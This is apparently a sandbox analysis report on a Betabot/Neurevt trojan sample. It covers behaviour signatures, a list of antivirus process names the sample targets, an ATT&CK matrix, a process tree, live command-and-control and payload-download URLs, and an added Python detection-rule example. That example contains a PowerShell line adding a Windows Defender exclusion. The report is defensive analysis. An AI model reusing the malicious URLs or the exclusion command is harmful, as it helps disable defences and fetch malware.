                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_004295F5 GetSystemTimeAsFileTime,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_0042997E GetTimeZoneInformation,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_0044E930 GetVersionExA,_fast_error_exit,_fast_error_exit,GetStartupInfoW,GetModuleHandleA,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      Modifies Internet Explorer zone settings
                      Source: C:\Windows\SysWOW64\explorer.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 2500
                      Source: C:\Windows\SysWOW64\explorer.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 2500
                      Source: C:\Windows\SysWOW64\explorer.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 2500
                      Source: Documento--SII--33875.exe | Binary or memory string: Firewall\GDFwSvc.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: Windows Defender\MSASCui.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: mcagent.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: AVKTray\AVKTray.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: avcenter.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: cfp.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: SBAMTray.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: sched.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: mcshield.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: AVK\AVKService.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: Firewall\GDFirewallTray.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: avgui.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: avgwdsvc.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: pctsSvc.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: avgupd.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: MsMpEng.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: mcupdate.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: a2service.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: pctsAuxs.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: MSASCui.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: avguard.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: BullGuard.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: avp.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: pctsGui.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: AVENGINE.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: a2start.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: avgnt.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: FPWin.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: procexp.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: a2guard.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: mbam.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: RavMonD.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: sbamui.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: op_mon.exe
                      Source: Documento--SII--33875.exe | Binary or memory string: FProtTray.exe
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\9sek3aw7533q9.exe DisableExceptionChainValidation

                      Stealing of Sensitive Information:

                      Yara detected Betabot
                      Source: Yara match | File source: 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3696, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Documento--SII--33875.exe PID: 4948, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 9sek3aw7533q9.exe PID: 6616, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: CpSHySoEfzH.exe PID: 3332, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: CpSHySoEfzH.exe PID: 2188, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: CpSHySoEfzH.exe PID: 2036, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: CpSHySoEfzH.exe PID: 3060, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: CpSHySoEfzH.exe PID: 4612, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 9sek3aw7533q9.exe PID: 5704, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: CpSHySoEfzH.exe PID: 2248, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 9sek3aw7533q9.exe PID: 6208, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: CpSHySoEfzH.exe PID: 4668, type: MEMORY
                      Source: Yara match | File source: 5.2.CpSHySoEfzH.exe.4650000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 20.2.CpSHySoEfzH.exe.3bd0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 21.2.9sek3aw7533q9.exe.2160000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 32.2.9sek3aw7533q9.exe.8c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.explorer.exe.2a00000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 14.2.9sek3aw7533q9.exe.960000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 23.2.CpSHySoEfzH.exe.4060000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.CpSHySoEfzH.exe.4470000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.CpSHySoEfzH.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.CpSHySoEfzH.exe.3ed0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.CpSHySoEfzH.exe.3b70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.CpSHySoEfzH.exe.41d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.Documento--SII--33875.exe.22a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 15.2.CpSHySoEfzH.exe.3740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 29.2.CpSHySoEfzH.exe.4000000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.CpSHySoEfzH.exe.3dd0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.CpSHySoEfzH.exe.3ad0000.1.raw.unpack, type: UNPACKEDPE
                      Tries to steal Mail credentials (via file access)
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Windows\SysWOW64\explorer.exe | File opened / queried: C:\Users\user\AppData\Roaming\.minecraft
                      Source: C:\Windows\SysWOW64\explorer.exe | File opened / queried: C:\Program Files (x86)\League of Legends

                      Remote Access Functionality:

                      Yara detected Betabot
                      Source: Yara match | File sources: the same 46 sources (17 memory dumps, 12 process memory spaces, 17 unpacked PE files) already listed under "Stealing of Sensitive Information" above

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation1 | LSASS Driver1 | LSASS Driver1 | Disable or Modify Tools21 | OS Credential Dumping | System Time Discovery2 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API1 | Image File Execution Options Injection1 | Image File Execution Options Injection1 | Deobfuscate/Decode Files or Information1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Man in the Browser1 | Exfiltration Over Bluetooth | Encrypted Channel12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Shared Modules1 | Registry Run Keys / Startup Folder11 | Process Injection612 | Obfuscated Files or Information2 | Security Account Manager | System Information Discovery45 | SMB/Windows Admin Shares | Data from Local System1 | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder11 | Software Packing21 | NTDS | Security Software Discovery441 | Distributed Component Object Model | Email Collection1 | Scheduled Transfer | Application Layer Protocol24 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading1 | LSA Secrets | Virtualization/Sandbox Evasion24 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion24 | Cached Domain Credentials | Process Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection612 | DCSync | Application Window Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories1 | Proc Filesystem | Remote System Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | NTFS File Attributes1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph (ID: 366082, sample: Documento--SII--33875.bin, start date: 10/03/2021, architecture: WINDOWS, score: 100)

Signatures on the start node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 11 other signatures.

Process tree (node id in brackets; numbers after a process are the graph's created-registry-value / created-file counts):

- [9] Documento--SII--33875.exe
    signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Injects a PE file into a foreign processes
    - [18] Documento--SII--33875.exe (12 / 25)
        signatures: Creates an undocumented autostart registry key; Maps a DLL or memory area into another process; Sample uses process hollowing technique; Hides that the sample has been downloaded from the Internet (zone.identifier)
        - [27] explorer.exe (16 / 55)
            network: rusianlover.icu 212.114.52.43 (ports 49715, 49718, 49720; COMBAHTONcombahtonGmbHDE, Germany); estrelladamm.icu 8.210.47.214 (ports 49719, 80; CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC, Singapore); zakriasons.co 104.21.55.228 (ports 443, 49716, 49717; CLOUDFLARENETUS, United States)
            dropped: C:\Users\user\AppData\Local\...\iom7q73oi.exe (PE32); C:\Users\user\AppData\...\agq5ooig7au.exe (PE32); C:\Users\user\AppData\...\9sek3aw7533q9_1.exe (PE32)
            signatures: System process connects to network (likely due to code injection or exploit); Creates files in alternative data streams (ADS); Overwrites Windows DLL code with PUSH RET codes; 5 other signatures
            - [32] iom7q73oi.exe
                network: 192.168.2.1 (unknown)
                signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Tries to steal Mail credentials (via file access); Adds a directory exclusion to Windows Defender
                - [42] powershell.exe
                - [44] powershell.exe
            - [36] CpSHySoEfzH.exe (injected; 2 / 23)
                signatures: Hides threads from debuggers; Hides that the sample has been downloaded from the Internet (zone.identifier)
            - [38] 9sek3aw7533q9_1.exe
                signatures: Machine Learning detection for dropped file
            - [40] 11 other processes
- [12] 9sek3aw7533q9.exe
    - [21] 9sek3aw7533q9.exe (23)
        signatures: Hides threads from debuggers
- [14] 9sek3aw7533q9.exe
    - [23] 9sek3aw7533q9.exe
- [16] 2 other processes
    - [25] 9sek3aw7533q9.exe
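The process relationships in the behavior graph (the injected explorer.exe starting the dropped binaries from Temp, iom7q73oi.exe starting powershell.exe to add a Defender exclusion, and the sample and 9sek3aw7533q9.exe each launching a second copy of themselves before hollowing) expressed as detection rules over process-creation events. This is an added example, not part of the Joe Sandbox report: the events are constructed in a Sysmon-like shape with made-up pids, and the powershell.exe command line (Add-MpPreference -ExclusionPath) is an assumption, since the report names only the signature.

```python
"""Turn the parent/child relationships in the behavior graph into detection rules.

Added example, not part of the Joe Sandbox report. The events below are
constructed in a Sysmon-like shape (pid, ppid, image, command line). The
powershell.exe command line is an assumption: the report only names the
signature "Adds a directory exclusion to Windows Defender", and
Add-MpPreference -ExclusionPath is the usual way that is done.
"""
import re

# Directories an unprivileged dropper can write to; the report's dropped files live here.
USER_WRITABLE = ("/appdata/local/temp/", "/programdata/", "/appdata/roaming/", "/users/public/")
# Assumed form of the exclusion command (Add-MpPreference is the real cmdlet).
DEFENDER_EXCLUSION_RE = re.compile(
    r"add-mppreference\b.*-exclusion(?:path|process|extension)", re.IGNORECASE)


def norm(path):
    """Lower-case a Windows path with forward slashes so it compares on any OS."""
    return path.replace("\\", "/").lower()


def image_name(path):
    return norm(path).rsplit("/", 1)[-1]


def in_user_writable(path):
    return any(d in norm(path) for d in USER_WRITABLE)


def rules(ev, parent):
    """Return the rule names that fire for one event given its parent (or None)."""
    findings = []
    img = image_name(ev["image"])
    pimg = image_name(parent["image"]) if parent else ""
    # R1: in the graph explorer.exe (injected by the sample) starts the dropped
    # binaries; explorer launching from Temp/ProgramData is the signal.
    if pimg == "explorer.exe" and in_user_writable(ev["image"]):
        findings.append("explorer-spawns-user-writable-binary")
    # R2: powershell adding a Defender exclusion, worse when its parent runs
    # from a user-writable directory (iom7q73oi.exe in the graph).
    if img in ("powershell.exe", "pwsh.exe") and DEFENDER_EXCLUSION_RE.search(ev["cmdline"]):
        findings.append("defender-exclusion-added")
        if parent and in_user_writable(parent["image"]):
            findings.append("exclusion-parent-in-user-writable-dir")
    # R3: the sample and 9sek3aw7533q9.exe each start a second copy of
    # themselves before hollowing; a process spawning its own image is a weak hint.
    if parent and norm(ev["image"]) == norm(parent["image"]):
        findings.append("self-relaunch")
    return findings


def analyze(events):
    """Evaluate every event; returns {pid: [rule, ...]} for events with hits."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for ev in events:
        found = rules(ev, by_pid.get(ev["ppid"]))
        if found:
            hits[ev["pid"]] = found
    return hits


def ancestry(events, pid):
    """Image names from pid up to the root, for printing context."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


EVENTS = [  # constructed; pids are made up, paths follow the report
    {"pid": 2001, "ppid": 1800, "image": r"C:\Users\user\Desktop\Documento--SII--33875.exe", "cmdline": ""},
    {"pid": 2002, "ppid": 2001, "image": r"C:\Users\user\Desktop\Documento--SII--33875.exe", "cmdline": ""},
    {"pid": 1234, "ppid": 2002, "image": r"C:\Windows\explorer.exe", "cmdline": ""},
    {"pid": 3001, "ppid": 1234, "image": r"C:\Users\user\AppData\Local\Temp\iom7q73oi.exe", "cmdline": ""},
    {"pid": 3002, "ppid": 1234, "image": r"C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe", "cmdline": ""},
    {"pid": 3003, "ppid": 3001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"'},
    {"pid": 3004, "ppid": 1234, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmdline": ""},
    {"pid": 3005, "ppid": 5000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Date"},
]

if __name__ == "__main__":
    for pid, found in analyze(EVENTS).items():
        print(pid, " <- ".join(ancestry(EVENTS, pid)), found)
```

R1 and R2 are the rules worth alerting on; R3 fires on plenty of legitimate software (installers, browsers) and is only useful as context next to the other two.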

Initial sample:

Source | Detection | Scanner | Label
Documento--SII--33875.exe | 49% | Virustotal |
Documento--SII--33875.exe | 100% | Joe Sandbox ML |

Dropped files:

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe | 40% | ReversingLabs | Win32.Trojan.Neurevt
C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.Wacatac
C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | 21% | ReversingLabs | Win32.Trojan.Wacatac

Unpacked PE files:

Source | Detection | Scanner | Label
14.1.9sek3aw7533q9.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
3.2.explorer.exe.e0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.1.Documento--SII--33875.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
3.2.explorer.exe.6870000.6.unpack | 100% | Avira | TR/Dropper.Gen
33.2.9sek3aw7533q9_1.exe.11d0000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
2.2.Documento--SII--33875.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
31.2.9sek3aw7533q9.exe.1180000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.2.Documento--SII--33875.exe.11c0000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
14.2.9sek3aw7533q9.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
34.2.iom7q73oi.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen
32.2.9sek3aw7533q9.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
32.1.9sek3aw7533q9.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
19.2.9sek3aw7533q9.exe.11e0000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
21.1.9sek3aw7533q9.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
21.2.9sek3aw7533q9.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
34.0.iom7q73oi.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen
11.2.9sek3aw7533q9.exe.12e0000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen

Domains:

Source | Detection | Scanner | Label
zakriasons.co | 4% | Virustotal |
estrelladamm.icu | 2% | Virustotal |
rusianlover.icu | 1% | Virustotal |
URLs:

Source | Detection | Scanner | Label
http://rusianlover.icu/forum/logout.php?id=1809723 | 0% | Avira URL Cloud | safe
http://estrelladamm.icu/get.php__vbaVarSetVar | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?page=7 | 0% | Avira URL Cloud | safe
http://estrelladamm.icu/old/GetDataAVK.exe | 4% | Virustotal |
http://estrelladamm.icu/old/GetDataAVK.exe | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://rusianlover.icu/forum/logout.php?id=5263631 | 0% | Avira URL Cloud | safe
https://contoso.com/License | 0% | URL Reputation | safe
http://rusianlover.icu/forum/logout.php?page=1 | 0% | Avira URL Cloud | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://zakriasons.co/wp-includes/rest-api/endpoints/898/getwd.exe | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?id=9885598 | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?pid=438 | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?id=9557666 | 0% | Avira URL Cloud | safe
http://estrelladamm.icu/old/get.php | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?id=2442663t | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php | 0% | Avira URL Cloud | safe
http://crl.mi | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?id=8085154 | 0% | Avira URL Cloud | safe
http://ocsp.digicert | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?id=2442663 | 0% | Avira URL Cloud | safe
https://l0ioz.icu/pub/bin.exe | 100% | Avira URL Cloud | malware
http://rusianlover.icu/forum/logout.php?id=2140088 | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?id=7086675 | 0% | Avira URL Cloud | safe
https://contoso.com/ | 0% | URL Reputation | safe
http://estrelladamm.icu/old/GetDataAVK.exe2 | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?page=83 | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?id=3125771 | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?pid=567 | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?pid=925 | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?id=1106076 | 0% | Avira URL Cloud | safe
http://rusianlover.icu/forum/logout.php?id=9292886 | 0% | Avira URL Cloud | safe
Contacted domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
zakriasons.co | 104.21.55.228 | true | true | | unknown
estrelladamm.icu | 8.210.47.214 | true | true | | unknown
rusianlover.icu | 212.114.52.43 | true | true | | unknown
Contacted URLs:

Name | Malicious | Antivirus Detection | Reputation
http://rusianlover.icu/forum/logout.php?id=1809723 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?page=7 | true | Avira URL Cloud: safe | unknown
http://estrelladamm.icu/old/GetDataAVK.exe | true | 4%, Virustotal; Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?id=5263631 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?page=1 | true | Avira URL Cloud: safe | unknown
http://zakriasons.co/wp-includes/rest-api/endpoints/898/getwd.exe | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?id=9885598 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?pid=438 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?id=9557666 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?id=8085154 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?id=2442663 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?id=2140088 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?id=7086675 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?page=83 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?id=3125771 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?pid=567 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?pid=925 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?id=1106076 | true | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?id=9292886 | true | Avira URL Cloud: safe | unknown
URLs from memory and binaries:

Name | Source | Malicious | Antivirus Detection | Reputation
http://estrelladamm.icu/get.php__vbaVarSetVar | explorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp; iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp | false | | high
https://www.mql5.com/ru/articles/download/69/system_data_sqlite.zip1 | explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
